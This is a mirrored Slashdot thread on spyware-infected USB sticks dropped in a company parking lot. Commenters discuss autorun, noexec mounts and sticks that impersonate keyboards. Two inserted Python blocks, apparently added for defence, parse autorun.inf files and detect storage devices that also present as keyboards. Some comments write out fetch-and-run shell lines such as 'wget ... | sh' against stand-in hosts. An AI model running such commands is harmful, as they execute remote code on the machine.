Slashdot Mirror


Criminals Distribute Infected USB Sticks In Parking Lot

New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."

46 of 298 comments

  1. Re:Expensive by Anonymous Coward · · Score: 4, Informative

    This will usually bypass all the internet-based filtering and security systems.

  2. That's what virtual machines are for. by Kenja · · Score: 5, Funny

    So you can load USB sticks you find and extract the pictures!

    --
    "Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
    1. Re:That's what virtual machines are for. by Anonymous Coward · · Score: 5, Insightful

      No, that's what operating systems that don't automatically run any executable that happens to appear are for.

      Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

    2. Re:That's what virtual machines are for. by Anaerin · · Score: 4, Interesting

      Just because it looks like a memory stick, doesn't mean it actually is one. Put a microcontroller in there with a USBHID type program and you've got a keylogger, or some other remote access system just waiting to be triggered.

    3. Re:That's what virtual machines are for. by Johann+Lau · · Score: 4, Insightful

      The human body either digests or kills anything that's not marked as belonging to the body. It does allow stuff on its surface and in the lining of the stomach I guess, but other than that, it seems to shoot first and ask questions later. Of course it can be tricked or overwhelmed, but it's not nearly as laid back as you seem to think. (Which can lead to horrible conditions where some body cells aren't recognized for some reason, and mercilessly attacked.)

      The human body = mean ass motherfucker. Don't even fucking look at the guy, or he will travel back in time and drop your parents before they can meet.

      Computers and operating systems, definitely consumer ones = uhm... Ralph Wiggum? Yeah, that seems about right :P

    4. Re:That's what virtual machines are for. by Anonymous Coward · · Score: 5, Interesting

      We had a couple turn up in our parking lot that when plugged in showed up as a hub that was connected to a USB drive, CD drive and a keyboard. The last one was tricky. After being plugged in, it would install the devices one by one and try to run them; if that didn't work, it registered as a keyboard and tried to put in the input of Windows key+R then iexplore websiteURL. That last one took me by surprise, as I'd never seen it before.

    5. Re:That's what virtual machines are for. by dryeo · · Score: 3, Interesting

      The quadrillion bacteria happily living in your guts would disagree, and depending on the type of their population they'll even change your behaviour.
      http://www.sciencedaily.com/releases/2011/05/110517110315.htm

      --
      https://en.wikipedia.org/wiki/Inverted_totalitarianism
    6. Re:That's what virtual machines are for. by JDG1980 · · Score: 4, Insightful

      Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

      Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

      As a result, Microsoft removed Autorun from USB drives as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).
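Added example, not code from the thread or from any project it names: the autorun.inf is the file that the "auto-loader" discussed above actually reads, so a sensible first triage step for a found stick is to mount it read-only and noexec on a Linux box and have something other than Windows tell you what the file would have launched. The parser below is deliberately as lenient as Windows' own (junk lines skipped, names case-insensitive, later duplicate keys win), because that leniency is what the bait relies on. The sample file is constructed, modelled on the "naked_secretary.exe" bait mentioned later in this thread.

```python
"""Triage an autorun.inf from a found stick (added example, not from the thread).

Mount the stick read-only and noexec on a Linux box first, then point this at
the autorun.inf to see what a Windows host that still honours AutoRun would
have launched or shown. The parser is deliberately lenient, because Windows'
own is: junk lines are skipped, section and key names are case-insensitive,
and a later duplicate key overwrites an earlier one. SAMPLE_AUTORUN_INF is a
constructed file modelled on the bait described in the thread.
"""
import re

SECTION_RE = re.compile(r"^\[([^\]]+)\]$")
KEY_RE = re.compile(r"^([^=]+?)\s*=\s*(.*)$")

SAMPLE_AUTORUN_INF = """\
; constructed sample
[AutoRun]
Open=naked_secretary.exe
Icon=%SystemRoot%\\system32\\SHELL32.dll,4
Label=Holiday pictures
shell\\open=Open
shell\\open\\Command=naked_secretary.exe
shell\\explore\\Command=naked_secretary.exe
shell=open
"""


def parse_autorun(text):
    """Return {section: {key: value}} with names lower-cased; tolerant of junk."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()     # drop a UTF-8 BOM and padding
        if not line or line[0] in ";#":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m[1].strip().lower()
            sections.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            sections[current][m[1].strip().lower()] = m[2]
    return sections


def launch_targets(sections):
    """Collect (kind, detail) findings from every [autorun*] section.

    kind is one of: 'open' / 'shellexecute' (run on insertion), 'verb'
    (a context-menu command), 'default-verb' (what a double-click on the
    drive icon runs) or 'disguise' (icon/label chosen to look harmless).
    """
    findings = []
    for name, keys in sections.items():
        if not name.startswith("autorun"):
            continue
        for k in ("open", "shellexecute"):
            if k in keys:
                findings.append((k, keys[k]))
        verbs = {}
        for k, v in keys.items():
            parts = k.split("\\")
            if len(parts) == 3 and parts[0] == "shell" and parts[2] == "command":
                verbs[parts[1]] = v
                findings.append(("verb", f"{parts[1]}: {v}"))
        if "shell" in keys:
            verb = keys["shell"].lower()
            findings.append(("default-verb", f"{verb}: {verbs.get(verb, '<no command>')}"))
        for k in ("icon", "label"):
            if k in keys:
                findings.append(("disguise", f"{k}={keys[k]}"))
    return findings


if __name__ == "__main__":
    for kind, detail in launch_targets(parse_autorun(SAMPLE_AUTORUN_INF)):
        print(f"{kind:13} {detail}")
```

Note what the 'default-verb' finding means: even where the insertion-time `open=` entry is no longer honoured, an autorun.inf can still redefine what a double-click on the drive icon runs, so a stick whose files look clean can still have a single entry point that is worth recording before anything else is touched.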

  3. Or just browse the thing while running Linux by the_humeister · · Score: 5, Funny

    Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.

    1. Re:Or just browse the thing while running Linux by ArchieBunker · · Score: 4, Informative

      Actually Autorun is no longer turned on by default in Windows. XP had an update that disabled it.

      --
      Only the State obtains its revenue by coercion. - Murray Rothbard
  4. Re:Expensive by shibashaba · · Score: 4, Insightful

    These were targeted specifically though at the one company, greatly increasing the odds of getting into something that they were interested in.

    --
    ---------- Open Source is capitalism applied to IP.
  5. just mount it in Linux by awollabe · · Score: 4, Interesting

    and laugh at the Windows auto-loader files they tried to get you with.

    Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.

    1. Re:just mount it in Linux by mlts · · Score: 4, Informative

      USB sticks can present themselves to the computer as more than just removable hard disks. I've seen some that will act as keyboards and when plugged into Windows, will automatically try to type things in.

      If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

    2. Re:just mount it in Linux by bill_mcgonigle · · Score: 4, Interesting

      If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

      I forget the exact mode of attack, but some will nudge the mouse a pixel or two every minute or so to prevent the screensaver from kicking on, and then after some period of user inactivity will begin doing the nefarious bits. I suppose it's easy to kick off a cmd shell from that point and script the attack.

      I'd imagine the non-mouse/keyboard part of the "drive" is baited with good porn or addictive games to encourage its continued presence. Anyway, you can scan it all you want, the drive is clean.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
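Added example, not code from the thread or from any project it names, for the "it looks like a stick but enumerates as a keyboard" pattern described by mlts and bill_mcgonigle above and by the parking-lot hub/drive/keyboard device earlier in the thread. It parses the text that `lsusb -v` prints (a real tool; the excerpt in SAMPLE_LSUSB_V is constructed) and flags two things: a single device exposing both a Mass Storage and a Human Interface Device interface, and any HID keyboard whose VID:PID is not on a site allowlist. KNOWN_KEYBOARDS is an assumption standing in for a real hardware inventory.

```python
"""Spot a "thumb drive" that also enumerates as a keyboard (added example).

This is not code from the thread or from any project it names. It parses the
text that `lsusb -v` prints (a real tool; SAMPLE_LSUSB_V below is constructed)
and flags the two patterns described above: one device exposing both a Mass
Storage and a Human Interface Device interface, and any HID keyboard whose
VID:PID is not on a site allowlist. KNOWN_KEYBOARDS is an assumption standing
in for a real inventory.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

HID, MASS_STORAGE, HUB = 3, 8, 9      # bInterfaceClass values from the USB spec
KEYBOARD_PROTOCOL = 1                 # bInterfaceProtocol of a boot-protocol keyboard
KNOWN_KEYBOARDS = {"1111:2222"}       # assumption: the site's issued keyboard model

DEVICE_RE = re.compile(r"^Bus (\d+) Device (\d+): ID ([0-9a-fA-F]{4}):([0-9a-fA-F]{4})\s*(.*)$")
FIELD_RE = re.compile(r"^\s*(bDeviceClass|bInterfaceClass|bInterfaceSubClass|bInterfaceProtocol)\s+(\d+)")

SAMPLE_LSUSB_V = """\
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Device Descriptor:
  bDeviceClass            9 Hub
  Configuration Descriptor:
    Interface Descriptor:
      bInterfaceClass         9 Hub
      bInterfaceSubClass      0
      bInterfaceProtocol      0 Full speed (or root) hub

Bus 001 Device 003: ID 1111:2222 Example Corp Office Keyboard
Device Descriptor:
  bDeviceClass            0
  Configuration Descriptor:
    Interface Descriptor:
      bInterfaceClass         3 Human Interface Device
      bInterfaceSubClass      1 Boot Interface Subclass
      bInterfaceProtocol      1 Keyboard

Bus 001 Device 007: ID 3333:4444 Unknown Vendor Flash Disk
Device Descriptor:
  bDeviceClass            0
  Configuration Descriptor:
    Interface Descriptor:
      bInterfaceClass         8 Mass Storage
      bInterfaceSubClass      6 SCSI
      bInterfaceProtocol     80 Bulk-Only
    Interface Descriptor:
      bInterfaceClass         3 Human Interface Device
      bInterfaceSubClass      1 Boot Interface Subclass
      bInterfaceProtocol      1 Keyboard
"""


@dataclass
class UsbDevice:
    bus: int
    address: int
    vid_pid: str
    name: str
    device_class: Optional[int] = None
    interfaces: List[list] = field(default_factory=list)   # [class, subclass, protocol]

    def has_class(self, cls):
        return any(i[0] == cls for i in self.interfaces)

    def is_keyboard(self):
        return any(i[0] == HID and i[2] == KEYBOARD_PROTOCOL for i in self.interfaces)


def parse_lsusb_verbose(text):
    """Turn `lsusb -v` output into UsbDevice records, one per 'Bus ... Device ...' header."""
    devices, current = [], None
    for line in text.splitlines():
        m = DEVICE_RE.match(line)
        if m:
            current = UsbDevice(int(m[1]), int(m[2]), f"{m[3]}:{m[4]}".lower(), m[5].strip())
            devices.append(current)
            continue
        m = FIELD_RE.match(line)
        if not (m and current):
            continue
        name, value = m[1], int(m[2])
        if name == "bDeviceClass":
            current.device_class = value
        elif name == "bInterfaceClass":
            current.interfaces.append([value, None, None])   # new interface record
        elif current.interfaces:
            current.interfaces[-1][1 if name == "bInterfaceSubClass" else 2] = value
    return devices


def audit(text, known_keyboards=KNOWN_KEYBOARDS):
    """Return (vid:pid, reason) findings for devices matching the attack patterns."""
    findings = []
    for d in parse_lsusb_verbose(text):
        if d.has_class(MASS_STORAGE) and d.has_class(HID):
            findings.append((d.vid_pid, "storage device that also presents a HID interface"))
        if d.is_keyboard() and d.vid_pid not in known_keyboards:
            findings.append((d.vid_pid, f"keyboard not on allowlist ({d.name})"))
    return findings


if __name__ == "__main__":
    for vid_pid, reason in audit(SAMPLE_LSUSB_V):
        print(f"{vid_pid}  {reason}")
```

A single snapshot is only as good as the moment it was taken: the devices described in this thread that wait for user inactivity, or whose firmware behaves differently depending on the host, may not show their keyboard interface at the instant you run `lsusb -v`, so hook a check like this to the udev add event rather than running it once by hand, and treat the VID:PID allowlist as a weak signal, since a programmable device can claim any ID it likes.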
  6. Cool, free thumb drive! by toygeek · · Score: 5, Interesting

    dd if=/dev/zero of=/dev/[usbdrive]

    voila, free thumb drive, malware free.

    1. Re:Cool, free thumb drive! by hawguy · · Score: 4, Insightful

      dd if=/dev/zero of=/dev/[usbdrive]

      voila, free thumb drive, malware free.

      Not if the drive has firmware that detects if it's plugged into a Windows host. For non-Windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3s from your Linux computer and everything is fine, but then when you give it to your wife and she sees a file named "naked_secretary.exe", she runs it and gets infected.

    2. Re:Cool, free thumb drive! by mark-t · · Score: 3, Informative

      After executing 'dd', you still need to run mkfs on the device that holds the filesystem, or else all you have is a blanked drive. Don't forget to use "-t vfat" as an option to mkfs, or else you won't be able to use it anywhere but in Linux.

    3. Re:Cool, free thumb drive! by k(wi)r(kipedia) · · Score: 4, Informative

      Not if the drive has firmware that detects if it's plugged into a Windows host.

      Interesting. But can Linux detect the presence of the firmware, which presumably has to send some sort of message down the USB bus? My closest experience to this is with a combo USB 3G modem and flash drive.

      To handle such devices under Linux, there's a program called USB modeswitch. From the package description:

      Mode switching tool for controlling "flip flop" USB devices

      Several new USB devices have their proprietary Windows drivers onboard, especially WAN dongles. When plugged in for the first time, they act like flash storage and start installing the driver from there. If the driver is already installed, the storage device vanishes and a new device, such as a USB modem, shows up. This is called the "ZeroCD" feature.

      On Debian, this is not needed, since the driver is included as a Linux kernel module, such as "usbserial". However, the device still shows up as "usb-storage" by default. usb-modeswitch solves that issue by sending the command which actually performs the switching of the device from "usb-storage" to "usbserial".

    4. Re:Cool, free thumb drive! by fermion · · Score: 3, Insightful

      As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.

      --
      "She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
  7. Re:Expensive by leftbrainstrain · · Score: 5, Informative

    I haven't heard of this technique actually being used in the wild, but it's enough of a threat to be included in the standard security training everyone has to take for at least a few Fortune 500 companies -- it's why some companies (and the U.S. military, I think) may disable USB ports. Trying to get at potential targets through standard attack vectors may not be effective, so if you have a financial backer this may present a promising attack vector that greedy targets may enable. The book "Security Engineering" cites this web site (had to find via archive.org) where a consulting company found out people inserted the USB sticks under slightly different circumstances: http://web.archive.org/web/20090621014856/http://www.vnunet.com/computing/news/2173365/uk-firms-naive-usb-stick

  8. Re:why would you run something from it? by hawguy · · Score: 3, Informative

    what if it had been raining?

    The flash drives would have been wet, yet fully functional after they dried?

      I've washed more than one flash drive and they still worked - I'm using one now that was washed over a year ago. I ran one through the driver once, and after I broke off the melted and misshapen plastic, I plugged it in and it worked.

  9. This is discussed in... by Darth_brooks · · Score: 4, Interesting

    This technique is discussed in "Metasploit - The penetration testers guide" ( http://shop.oreilly.com/product/9781593272883.do )

    Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.

    --
    There are some people that if they don't know, you can't tell 'em.
  10. Re:why would you run something from it? by petermgreen · · Score: 3, Interesting

    There are a few factors

    1: the dominant operating system has blurred the line between running executables and opening data files. Then they went even further and introduced autorun to make users' lives easier. They have tried to put these genies back in the bottle but it's difficult to do without introducing a load of pain for users.
    2: Even if the OS doesn't have the above problem a USB stick could be put together that enumerated as a keyboard as well as a mass storage device; it could then do pretty much anything the user can do (though it has to do it blind).
    3: the natural assumption when finding a USB stick in the company parking lot is that a co-worker dropped it. Therefore the natural thing to do is to try and determine who owns it so it can be returned to its rightful owner. Determining who owns it generally requires looking at the contents.

    --
    note: i'm known as plugwash most places but i screwed up registering that here somehow in the past and now can't register
  11. Re:Expensive by wierd_w · · Score: 4, Interesting

    Personally, I'd target smartphones.

    If I were a malicious programmer out to get corporate dirt, I would release a "perfectly harmless" appstore game or business applet. This applet does not in any way harm the phone, or call home. What it does instead is drop some binaries on the root of the internal sdcard or flash memory storage device to mimic this attack.

    This has several advantages:

    1) you can update your penetration package as part of an app update, which the user won't catch.

    2) you can target a device frequently demanded to be added to device exception lists, such as corporate CEOs insisting their iBone be able to sync their corporate email.

    This gives you a mostly unprotected path to the mailserver if the package delivery mechanism is done right.

    In the case of android phones at least, you can control how the device talks to the computer, and what HID classes it wants. This could let the phone operate as a hardware keylogger, etc.

    Seriously, smartphones are a torpedo.

  12. Re:why would you run something from it? by Eyeball97 · · Score: 5, Funny

    I ran one through the driver once

    I say old chap, that's a bit rough, what? I hope you paid his medical expenses and gave him a shilling bonus after that experiment. Toodle pip...

  13. Old trick. by Caerdwyn · · Score: 5, Insightful

    This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.

    A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.

    --
    Everybody gets what the majority deserves.
  14. Re:Expensive by GumphMaster · · Score: 4, Interesting

    In certain military environments I worked in the USB, Firewire, and microphone ports were immediately filled with epoxy and (where possible) disconnected from the motherboard.

    --
    Patent litigation: A doctrine of Mutually Assured Destruction... in which everyone seems willing to push the button
  15. Personal Story by schklerg · · Score: 4, Interesting

    So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
    So there may be a virus, or maybe just a lonely coworker.

    --
    Be Excellent To Each Other
    1. Re:Personal Story by phantomfive · · Score: 5, Funny

      Many of them. All alone.

      You looked at them all to 'make sure,' huh?

      --
      "First they came for the slanderers and i said nothing."
  16. Contest by chrismcb · · Score: 4, Interesting

    Wouldn't it be more productive to give them away? As in brand them with the name of a product, and literally give them away at a place where the employees visit. I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.

  17. Re:Expensive by Anonymous Coward · · Score: 4, Informative

    Yes, but with Linux you could mount the filesystem noexec and the malware writer would have to figure out how to get it to execute in order to undo the restriction. Which is a substantially harder thing than figuring out how to get it to autorun. Any idiot that's running strange programs from found USB drives deserves whatever malware he gets.

  18. Linux virus by DrYak · · Score: 5, Informative

    If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering it's really not hard to target Linux just as the malware writers target Windows and OSX now.

    From the article you mention:

    A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.

    Done. Modern versions of KDE need launchers to have execute permission. That hole is patched.

    And nobody pretends that Linux has some magical immunity to viruses. As a Unix-like OS it just follows a few key principles:
    - don't blindly execute everything. Require executables to be explicitly marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
    - don't run constantly as root. Thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further deeper compromising of the running system).
    That doesn't magically solve all malware problems in the universe. But at least it makes the life of a malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule. Which has since then been corrected.

    Back then, these no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when the users are used to clicking "okay" on everything, that remains to be seen).

    Or did you think android runs on Windows?

    Android is a completely different beast and instead of a Unix-like userland it uses its very own userland (a Java-like system).
    Though it too doesn't allow execution of arbitrary e-mail attachments. It's not impossible to write Android malware, even malware that finds a way to look legitimate to Android's capability system.

    But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except Windows (and that's until WinXP; starting from Vista, you get a UAC dialog telling you that you run an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).

    --
    "Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
    1. Re:Linux virus by ais523 · · Score: 3, Informative

      Same with Gnome, btw; a launcher without execute permission will get opened in a text editor if you double-click on it.

      --
      (1)DOCOMEFROM!2~.2'~#1WHILE:1<-"'?.1$.2'~'"':1/.1$.2'~#0"$#65535'"$"'"'&.1$.2'~'#0$#65535'"$#0'~#32767$#1"
    2. Re:Linux virus by Compaqt · · Score: 4, Informative

      >mount -o noexec /dev/usb /media/usb_stick

      How many people are going to do that?

      Most any distribution will automount anything you plug in. You never get the chance to run your mount command.

      You're talking about what you would do. Everybody else is talking about what the average person would do.

      By the way, what are you running--a server distro?

      Even if we limit ourselves to a Linux shop (say one of the ones which have been covered by Slashdot, Munich city government or whatever), the average user does not have USB autodetection turned off. How else do their USB keyboards work?

      --
      I'm not a lawyer, but I play one on the Internet. Blog
    3. Re:Linux virus by drawfour · · Score: 4, Funny

      Looks like I'm safe!

      C:\Users\drawfour>wget houghi.org/trojan && sh trojan
      'wget' is not recognized as an internal or external command,
      operable program or batch file.

    4. Re:Linux virus by ozmanjusri · · Score: 4, Informative

      How many people are going to do that?

      Everybody *

      Desktop distributions use pmount for USB hotplugging. From the man page:

      OPTIONS
      ...

        -e, --exec
            Mount the device with the exec option. Default is noexec.

      http://www.linuxcertif.com/man/1/pmount/

      By the way, what are you running--a server distro?

      Most server distros don't automount (no desktop). You can get them to automount USB drives to a specified location (ie, for a media server) but need to install and enable the automount package and configure it, much like colinrichardday's suggestion.

      * Rounded up for clarity.

      --
      "I've got more toys than Teruhisa Kitahara."
  19. He Didn't Have his Home Address on His Resume? by Greyfox · · Score: 4, Funny

    Didn't occur to you to go to his house, pick the locks, and leave the drive on his night stand? Because that would have been AWESOME!

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  20. It might not be a drive by Chuck+Chunder · · Score: 4, Insightful

    The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:

    wget -q -O - http://naughty.com/ | sh

    All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.

    --
    Boffoonery - downloadable Comedy Benefit for Bletchley Park
  21. Speculation vs Investigation by Anonymous Coward · · Score: 4, Interesting

    The 'cyber criminals planted the usb sticks in an attempt to steal data'... stuff doesn't come from investigation, it comes from speculation. It could simply have been an infected USB stick an employee threw away or dropped.

    DSM is really a boring chemicals business, employing tens of thousands of people. The chances of spyware getting past anti virus software and onto the right persons computer is pretty damn slim.

    So it looks more like projection to me. There's a lot of talk about cybercriminals as part of the 'cyberwar' budget requests. This was a lost USB key infected. IT dept projects the cyberwar onto their company and assumes it was a cyberattack and not some piece of crapware. Cyberwar lobby grabs the story and pumps it up for their own agenda.

    1. Re:Speculation vs Investigation by dutchwhizzman · · Score: 3, Informative

      No, it's investigation. It's not just one stick, there were multiple sticks with the exact same contents on the parking lot at the same time. Yes, that sounds as clumsy as it is.

      --
      I was promised a flying car. Where is my flying car?
  22. Re:Expensive by InspectorGadget1964 · · Score: 3, Insightful

    A properly coded operating system would not execute an unknown application without first asking the user. Furthermore, a correctly built operating system would not allow applications executed by an unprivileged user to gain control of the operating system. As you see your comments lack validity. As far as the website you mentioned, that advice will only work with systems that have been badly configured with the intention of allowing an intruder to penetrate them. I suggest you get familiar with real operating systems and stop playing with what in the computer world qualifies as “toddler operating systems” that lack the strength and maturity to operate in an unprotected environment.

  23. Re:Expensive by Anonymous Coward · · Score: 5, Interesting

    dud example

    There are no examples, and the "5 easy steps" from the linked page haven't worked for years.

    One of the reasons Linux is more secure is that the community responds far more quickly to potential threats.

    Hairyfeet always gets to +5 with votes from the Apple/Windows crowd here, but he's never been able to show a single current instance of actual Linux malware in the wild. Much like the 235 patents, it's always threats from the future or the past.

  24. Re:Expensive by Tom · · Score: 3, Insightful

    I know that taking away the mouse and keyboard dramatically reduces the number of user mistakes, but I do wonder if this isn't taking it a little too far.

    --
    Assorted stuff I do sometimes: Lemuria.org
  25. Re:why would you run something from it? by Hognoxious · · Score: 4, Interesting

    Since ./ is a liberal cesspool

    The contents of your current working directory are of no interest to me.

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  26. Re:Expensive by hlavac · · Score: 3, Funny

    Of course on a properly managed system, also on Windows, such a USB stick will do nothing.

    Because all the USB ports are filled with glue.

  27. Re:Expensive by TheRaven64 · · Score: 3, Informative

    noexec only disables things that the kernel runs directly. It doesn't disable scripts if you invoke them via the correct command interpreter and it certainly doesn't protect you against, for example, a libpng or libjpeg exploit and a malicious image.

    --
    I am TheRaven on Soylent News